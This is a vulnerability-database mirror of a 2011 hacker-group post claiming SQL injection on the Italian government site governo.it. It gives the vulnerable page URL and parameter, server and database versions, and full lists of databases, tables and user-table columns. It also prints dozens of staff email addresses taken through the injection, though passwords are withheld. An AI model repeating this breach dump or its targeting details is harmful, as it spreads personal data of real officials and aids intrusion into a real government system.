Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Governo.it SQL Injection

🗓️ 06 Jan 2011 00:00:00Reported by SYSTEM_OVERIDEType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 31 Views

SQL injection vulnerability found on Governo.it affecting Microsoft SQL Server 2000 databases.

Code
`==============================================================  
Governo.it  
**************************************************************  
SQL Injection Vulnerability  
**************************************************************  
  
# We are:  
# ------------------------------------------------------------  
# God_Of_Pain  
# Lord TittiS  
# SYSTEM_OVERIDE  
# ------------------------------------------------------------  
# Date: 28/12/2010  
# ------------------------------------------------------------  
# [1] Site And Server Info  
# [2] SQL Detail  
# [3] Users Found Information  
# ------------------------------------------------------------  
  
  
* [1] Site And Server Info  
  
  
# Bug Url:  
http://www.governo.it/notizie/not_notizia.asp?idno=3349 (Same site)  
http://palazzochigi.it/notizie/not_notizia.asp?idno=3349 (Same site)  
  
# Powered By: ASP.NET  
  
# Server Detail: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)  
  
# Server Name: WEB-VSQL1\INST1  
  
# Current DB: chigi_intranet  
  
# Database : MSSQL 2005  
  
  
  
  
  
* [2] SQL Detail  
  
  
# Databases List:  
- chigi_intranet  
- master  
- tempdb  
- model (LOCKED)  
- msdb  
- AAA (LOCKED)  
- chigi_mag2006  
- chigi_intranet  
- chigi_developer  
- sondaggidb (LOCKED)  
- AffariRegionali_BO (LOCKED)  
  
# Tables of 3 DB:  
  
[+] chigi_intranet:  
doc_tipi  
qst_datipersonali  
doc_target  
doc_prov_tipi  
eml_scrivi_a  
doc_prov_aree  
doc_monitoraggio_soggetto  
eml_categoria  
doc_monitoraggio_sede  
doc_monitoraggio_organo  
doc_monitoraggio_azione  
doc_lingue  
eml_autori_aree  
doc_iter  
doc_fonti  
doc_dossier  
doc_documenti_swap  
doc_atti_tipi  
doc_associatipi  
Composizionenewsletter  
eml_aree  
Argomento  
eml_registra_operazione  
ana_amministratori_pubblici  
qst_pianodiazione  
web_webletter_log  
pag_sezioni_pagine  
pag_documenti_sezioni  
faq_keyword  
faq_faq_gruppi_keyword  
doc_documenti_target  
doc_documenti_monitoraggio  
doc_documenti_links  
doc_documenti_fonti  
doc_documenti_dossier  
doc_documenti_allegati  
web_webletter_testo  
pag_sezioni  
int_interrogazioni  
faq_form_richieste  
faq_faq  
faq_diritti_utenti  
doc_monitoraggio_soggetto_prov_tipi  
pag_autori_pagine  
doc_monitoraggio_azione_prov_tipi  
doc_fonti_tipi  
doc_documenti  
ana_amministratori_pubblici_mail  
nwl_Newsletter  
web_webletter  
temp_monitoraggio  
Results  
pag_pagine  
nwl_Notizianewsletter  
nwl_Notizia_link  
nwl_Notizia_argomento  
nwl_Composizionenewsletter  
nwl_Argomento  
not_notizia_pub  
not_notizia_link  
not_notizia_argomento  
not_notizia  
not_immagini  
log_ricerca  
log_Domande  
int_tipi_interrogazione  
int_sedi  
int_gruppi_parlamentari  
ana_autori  
gen_governi  
faq_gruppi_keyword  
faq_aree_tematiche  
dtproperties  
faq_aree  
qst_semplificazione_proposte  
  
[+] Master:  
spt_server_info  
spt_datatype_info  
MSreplication_options  
spt_datatype_info_ext  
spt_provider_types  
spt_fallback_usg  
spt_fallback_dev  
spt_fallback_db  
spt_values  
spt_monitor  
  
  
[+] Msdb:  
sysjobschedules  
RTblIfaceMem  
backupfile  
syscategories  
systargetservers  
RTblWorkspaceItems  
restorehistory  
systargetservergroups  
RTblDatabaseVersion  
systargetservergroupmembers  
sysalerts  
RTblDTSProps  
RTblVersionAdminInfo  
restorefile  
sysoperators  
sysnotifications  
RTblParameterDef  
restorefilegroup  
systaskids  
syscachedcredentials  
RTblIfaceHier  
logmarkhistory  
RTblNamedObj  
sysdtscategories  
sysdtspackages  
RTblTypeInfo  
sysdtspackagelog  
RTblScriptDefs  
RTblOLPProps  
sysdtssteplog  
RTblEnumerationDef  
sysdtstasklog  
RTblClassExtension  
RTblSumInfo  
RTblMDSProps  
RTblEnumerationValueDef  
RTblUMLProps  
sysdbmaintplans  
sysdbmaintplan_jobs  
RTblUMXProps  
sysdbmaintplan_databases  
RTblSIMProps  
sysdbmaintplan_history  
RTblGENProps  
RTblDTMProps  
log_shipping_primaries  
log_shipping_secondaries  
RTblDBMProps  
RTblEQMProps  
log_shipping_monitor  
mswebtasks  
log_shipping_databases  
log_shipping_plans  
RTblVersions  
log_shipping_plan_databases  
log_shipping_plan_history  
RTblDBXProps  
RTblRelships  
RTblSites  
RTblProps  
RTblRelshipProps  
RTblPropDefs  
RTblRelColDefs  
RTblIfaceDefs  
backupmediaset  
sqlagent_info  
RTblClassDefs  
sysdownloadlist  
backupmediafamily  
sysjobhistory  
sysjobs  
RTblTFMProps  
RTblRelshipDefs  
backupset  
sysjobservers  
RTblTypeLibs  
sysjobsteps  
  
  
  
* [3] Users Found Information  
  
The table "ana_autori" would seem the users table.  
Search the columns:  
  
aaut_alias  
aaut_approva  
aaut_cancella  
aaut_cognome  
aaut_consultazione  
aaut_dipartimento  
aaut_dossier  
aaut_email  
aaut_fonti  
aaut_gestpagine  
aaut_gestutenti  
aaut_governi  
aaut_id  
aaut_logs  
aaut_newsletter  
aaut_nome  
aaut_note  
aaut_password  
aaut_questiontime  
aaut_rassegna  
aaut_rep_amministratori  
aaut_scrivia  
aaut_sigla  
aaut_tipi  
  
Get data from "aaut_mail" and "aaut_password"  
  
Result is:  
[email protected]  
a.decaroli@palazzochigi,it  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
cips @ciaps.com  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
f.salzano@governoit  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
[email protected]  
  
I do not post the passwords.  
  
# End :)  
==============================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Jan 2011 00:00Current
0.1Low risk
Vulners AI Score0.1
sql injection vulnerabilitymicrosoft sql servergoverno.itdatabase detailsasp.netuser information
31